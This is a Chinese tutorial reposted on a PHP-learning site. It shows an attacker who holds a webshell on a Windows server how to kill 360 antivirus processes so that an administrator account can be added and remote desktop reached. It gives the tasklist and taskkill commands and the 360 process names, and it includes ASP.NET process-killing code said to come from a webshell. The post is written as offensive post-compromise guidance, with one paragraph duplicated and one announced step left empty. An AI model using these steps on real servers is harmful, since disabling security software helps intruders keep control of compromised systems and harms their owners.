来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] webshell有system权限,无法添加administrators用户,最后无法成功连接3389,这一般都是杀毒软件引起了,说下突破360的方法先查看进程:tasklist然后杀掉进程:taskkill /im 进程名.exe /f这些是360的进程...
|
webshell有system权限,无法添加administrators用户,最后无法成功连接3389,这一般都是杀毒软件引起了,说下突破360的方法
先查看进程:tasklist
然后杀掉进程:taskkill /im 进程名.exe /f
这些是360的进程:360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe
然后关掉360的主动防御,方法:
Windows下Apache+PHP的特殊性,导致很多php站的webshell有SYSTEM的权限,所以结束360简直易如反掌啊。
即使不是SYSTEM,也有办法的,例如ASPX,asp.net有个操纵进程的功能。看代码(直接从webshell上面拔下来的):
Windows下Apache+PHP的特殊性,导致很多php站的webshell有SYSTEM的权限,所以结束360简直易如反掌啊。
即使不是SYSTEM,也有办法的,例如ASPX,asp.net有个操纵进程的功能。看代码(直接从webshell上面拔下来的):
protected void kp_Click(object sender, EventArgs e)
{
Process[] kp = Process.GetProcesses ();
foreach ( Process kp1 in kp )
if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
{
try
{
kp1.Kill();
Response.Write(“<script>alert(‘Killed’);location.href=’?'</” + “script>”);
ListBox1.Items.Clear();
}
catch (Exception x)
{
Response.Write(x.Message.ToString());
Response.End();
} www.2cto.com
}
}
asp.net的这一个kill()函数即使是IIS+ASPX的users用户组依然可以轻松杀死360。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
